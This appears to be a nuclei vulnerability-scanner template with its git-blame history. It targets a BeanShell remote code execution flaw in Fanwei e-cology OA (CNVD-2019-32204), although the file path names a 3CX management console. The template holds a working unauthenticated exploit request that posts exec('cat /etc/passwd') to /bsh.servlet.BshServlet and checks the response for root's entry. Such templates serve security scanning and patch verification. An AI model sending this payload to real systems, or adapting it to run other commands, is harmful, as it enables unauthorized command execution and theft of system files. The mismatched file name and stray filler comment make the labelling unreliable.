nuclei-templates/vulnerabilities/other/3cx-management-console.yaml

id: CNVD-2019-32204
# AAAAAAAA
info:
  name: Fanwei e-cology <= 9.0 Remote Code Execution
  author: daffainfo
  severity: critical
  description: The attacker can directly execute arbitrary commands on the target server by invoking the unauthorized access problem interface in the BeanShell component. Currently, the security patch for this vulnerability has been released. Please take protective measures as soon as possible for users who use the Fanwei e-cology OA system.
  reference:
    - https://blog.actorsfit.com/a?ID=01500-11a2f7e6-54b0-4a40-9a79-5c56dc6ebd51
  tags: fanwei,cnvd,cnvd2019,rce

requests:
  - raw:
      - |
        POST /bsh.servlet.BshServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        bsh.script=exec("cat+/etc/passwd");&bsh.servlet.output=raw

    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

# Enhanced by cs on 2022/05/06
Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs 2022-05-06 20:10:15 +00:00			`id: CNVD-2019-32204`
			`# AAAAAAAA`
Create 3cx-management-console.yaml 2022-04-02 10:54:05 +00:00			`info:`
Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs 2022-05-06 20:10:15 +00:00			`name: Fanwei e-cology <= 9.0 Remote Code Execution`
Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs 2022-05-06 19:18:57 +00:00			`author: daffainfo`
			`severity: critical`
Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs 2022-05-06 20:10:15 +00:00			`description: The attacker can directly execute arbitrary commands on the target server by invoking the unauthorized access problem interface in the BeanShell component. Currently, the security patch for this vulnerability has been released. Please take protective measures as soon as possible for users who use the Fanwei e-cology OA system.`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`reference:`
Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs 2022-05-06 20:10:15 +00:00			`- https://blog.actorsfit.com/a?ID=01500-11a2f7e6-54b0-4a40-9a79-5c56dc6ebd51`
			`tags: fanwei,cnvd,cnvd2019,rce`
Create 3cx-management-console.yaml 2022-04-02 10:54:05 +00:00
			`requests:`
Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs 2022-05-06 19:18:57 +00:00			`- raw:`
			`- \|`
Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs 2022-05-06 20:10:15 +00:00			`POST /bsh.servlet.BshServlet HTTP/1.1`
Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs 2022-05-06 19:18:57 +00:00			`Host: {{Hostname}}`
Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs 2022-05-06 20:10:15 +00:00			`Content-Type: application/x-www-form-urlencoded`
Update 3cx-management-console.yaml 2022-04-06 04:00:14 +00:00
Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs 2022-05-06 20:10:15 +00:00			`bsh.script=exec("cat+/etc/passwd");&bsh.servlet.output=raw`
Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs 2022-05-06 19:18:57 +00:00
Create 3cx-management-console.yaml 2022-04-02 10:54:05 +00:00			`matchers:`
Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs 2022-05-06 20:10:15 +00:00			`- type: regex`
			`regex:`
			`- "root:.*:0:0:"`
Update 3cx-management-console.yaml 2022-04-06 04:00:14 +00:00
Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs 2022-05-06 19:18:57 +00:00			`# Enhanced by cs on 2022/05/06`